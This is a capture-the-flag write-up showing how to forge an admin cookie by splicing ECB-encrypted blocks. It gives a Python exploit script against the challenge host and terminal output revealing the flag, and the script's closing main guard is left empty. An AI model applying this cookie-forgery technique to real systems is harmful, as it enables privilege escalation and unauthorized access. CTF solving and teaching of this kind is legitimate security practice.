A cookie using ECB mode encryption allows an attacker to forge admin privileges by rearranging encrypted blocks for decryption.


Here’s our solution:

import requests

host = "http://problems.ctfx.io:7001/"
#host = "http://localhost:3000/"
evil_params = {'username': 'AAAAAAAAAAAAAAA', 'password':'BBBBBBBBBBB',
               'dmin':1, 'a':1}

def chunk(d, sz):
    return [d[i:i+sz] for i in range(0, len(d), sz)]

def main():
    s = requests.Session()
    s.post(host + "login", data=evil_params)
    auth = s.cookies.get("auth")
    auth_chunks = chunk(auth, 32)
    reveal = "".join((auth_chunks[0], auth_chunks[1], auth_chunks[4]))
    s.cookies.set("auth", reveal)
    flag_text = s.get(host).text
    for i in flag_text.split("\n"):
        if "Flag" in i:
            print i

if __name__ == "__main__":

Running the script:

amon@Evanna:~/ctf/ctfx/crypto/customauth$ python exploit.py
        <span><b>Flag: </b><code>ctf(ecb_m0de_too_Ez?)</code></span>

Flag: ctf(ecb_m0de_too_Ez?)

Leave a Comment